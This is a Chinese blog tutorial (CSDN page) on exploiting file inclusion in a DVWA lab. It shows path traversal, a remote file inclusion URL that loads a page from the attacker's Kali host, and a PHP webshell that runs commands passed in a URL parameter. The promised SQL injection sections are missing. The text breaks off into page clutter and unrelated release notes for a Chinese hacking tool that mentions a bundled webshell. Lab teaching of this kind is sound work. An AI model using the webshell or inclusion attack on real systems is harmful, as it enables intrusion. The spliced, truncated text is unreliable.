利用漏洞注入

本文详细介绍了漏洞注入的概念及其在实际攻击中的应用,包括文件包含漏洞和SQL注入。通过实例演示了如何寻找文件包含漏洞,利用Burp Suite进行文件上传和包含,以及手动识别和利用SQL注入。同时,文章还总结了SQL注入的基本语句和MySQL相关知识,以及多种类型的SQL注入方法。最后,讨论了如何绕过一些防护措施进行注入攻击。
摘要由CSDN通过智能技术生成

文章目录


前言

在计算机安全领域,漏洞注入是一种常见的攻击技术,它利用软件漏洞或安全漏洞来攻击计算机系统。漏洞注入可以用于窃取数据、获取系统权限、破坏系统等各种恶意行为。为了保护计算机系统的安全,渗透测试和漏洞注入已经成为一个必不可少的领域。

本文将介绍漏洞注入的基本原理和方法,使用漏洞注入进行攻击的常见技术和工具,以及如何使用漏洞注入来防范攻击。此外,本文还提供了一系列实用的漏洞注入示例,以帮助读者更好地理解和应用这些技术。

无论您是一名网络安全专业人员还是一个普通用户,理解漏洞注入的原理和方法都非常重要。本文将深入探讨漏洞注入技术,以帮助您更好地理解和保护计算机系统的安全。

一、寻找文件包含漏洞

环境准备

1.开启OWASP靶机和Kali虚拟机

开启OWASP靶机

在这里插入图片描述
开启Kali虚拟机

在这里插入图片描述

2.kali中登陆dvwa(用户名和密码都是 admin),进入 File Inclusion 页面

在Kali中登录dvwa,进入File Inclusion页面

在这里插入图片描述

寻找文件包含漏洞案例

1.File Inclusion 页面提示要测试包含的内容,将浏览器的URL中的page改为index.php进行尝试

在File Inclusion页面提示要测试包含的内容,将浏览器的URL中的page改为index.php进行尝试

在这里插入图片描述

2.为了尝试攻击,需要知道存在本地的文件名称,知道有个 index.php 在根目录下,所以尝试下目录遍历和文件包含。提交参数为…/…/index.php,可以证明存在文件包含漏洞了(“…/”表示返回上一级目录)

现在我们将浏览器的URL中的page改为…/…/index.php进行尝试

在这里插入图片描述

3.下面尝试一下远程文件包含漏洞。首先在Kali启动 apache 服务器:service apache2 start

在Kali虚拟机中启动Apache服务器,命令如下:

service apache2 start

在这里插入图片描述

4.现在利用这个文件包含漏洞,包含一下 Kali 的 apache 页面

在浏览器的URL中输入以下命令:

http://192.168.137.138/dvwa/vulnerabilities/fi/?page=http://192.168.137.167/index.html

得到结果

在这里插入图片描述

二、文件包含和文件上传

环境准备

1.开启OWASP靶机和Kali虚拟机

开启OWASP靶机

在这里插入图片描述
开启Kali虚拟机

在这里插入图片描述

2.在kali的/root/Document路径下,创建webshell.php文件

在Kali的/root/Document路径下,创建webshell.php文件,内容如下:

<?
    system($_GET['cmd']);
    echo 'Type a command:<form method="get"
    action="../../hackable/uploads/webshell.php"><input
    type="text" name="cmd"/></form>';
?>
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Domain4.3(明小子)10.10.10更新版主要更新内容如下: 1.驱除部分死连接,恢复部分官方连接 2.改变默认显示页面为本人BLOG 3.修正程序在检测时出错的BUG 4.修正程序在部分系统中无法启动的BUG 5.加了一个功能模块,但还不成熟,隐藏了,高手的话可以用OD调出来!>!< 6.修复前段时间一些朋友反映的错误和程序宏 7.增加四款SKN皮肤! 10.10.11紧急更新: 1.修正新版程序在部分系统中启动后直接导致系统蓝屏的BUG 2.修正域名查询的几个错误 3.修正程序批量检测查询到域名的时候无反映的BUG! Domain4.2(明小子)10.01.16更新版主要更新内容如下: 1.删除所有无关数据 2.优化急速代码 3.改变启动线程 4.增加SQL数据批量导出功能 5.加入几个优化进程模块,非后门.后台运行. 6.锁定主程序栏目宽和高,不在恢复 7.删除“辅助工具”模块中全部代码 8.修正XP SP3 程序下兼容问题 9.重新改写域名查询旁站线程 程序于2018年01月16号调试完毕! 提别提示:第4个功能只能运行在完整版的windows XP 平台系统中,其他平台无法运行,如果出现恢复按钮并不能保存请自行调试与本程序无关.谢谢合作! 宝宝的话:有朋友们的鼓励才会有这个版本的发布,这当是我送给大家2010年里的第一个礼物吧。 Domain4.1(明小子)0901更新版主要更新内容如下: 1.增加新系统兼容模块,全面兼容2000-2008各系统 (部分精简版系统除外) 2.优化网站打开速度,删减部分无用内核信息,全面加快程序启动速度. 3.基于09.05.20号内核提升,改变搜查循环的一个死BUG! 4.删除在0520上增加的一个补针函数,并使用新的函数替换.保证不报错. 5.不在兼容xpsp3,因为没时间去修正这个错误。所以可能部分SP3系统运行不起来本程序 6.增加部分程序扩充空格代码,为下个版本更新做好铺垫 小提示:保留旧的IP反查连接系统,原因没有找到新的和稳定的IP反差服务器!如果有能提供的请与本人联系!谢谢合作 Domain4.1(明小子)0520更新版主要更新内容如下: 1.基于08.10.01号内核提升,修正一次关键错误。 2.替换原程序自带的那个小马,该为最新美化免杀版的小马! 3.添加一个服务器挂钩程序(非插件),使修改后的新内核兼容vista系统。 4.程序数据库默认名为:SetData.mdb 请大家使用3.5版本以上的MDB数据.其他低版本程序可能不兼容! 5.删除后台下载统计代码(以前没发现,本人也是从网站上面下的软件,排除作者自添加行为) 6.加了一个补针,针对sql注入功能中的一个小BUG。 7.删除了很多没有用的代码,最大限度的优化程序启动速度。 8.更新部分在xpsp3下出错的几个小BUG(小问题小解决,这个错误仅针对部分优化过度的XPSP3系统)。 提记:很多朋友说需要修改下程序IP域名查询功能,这里说明下.由于内核找不到关键句柄导致无法更新,下个版本在仔细看看! Domain4.0(明小子)1001更新版主要更新内容如下: 1.更新部分过度优化过的系统不兼容问题。 2.修改内存识别函数,使其降低软件在使用期间所占用的内存大小。 3.基于08.09.15号内核提升,修正因修改软件所出现的几个导致软件崩溃的几个BUG。 4.换了软件自带的那个垃圾皮肤。加入兼容美化皮肤!更美观! 5.兼容前版本数据库支持功能
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xianpaopao NO.1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值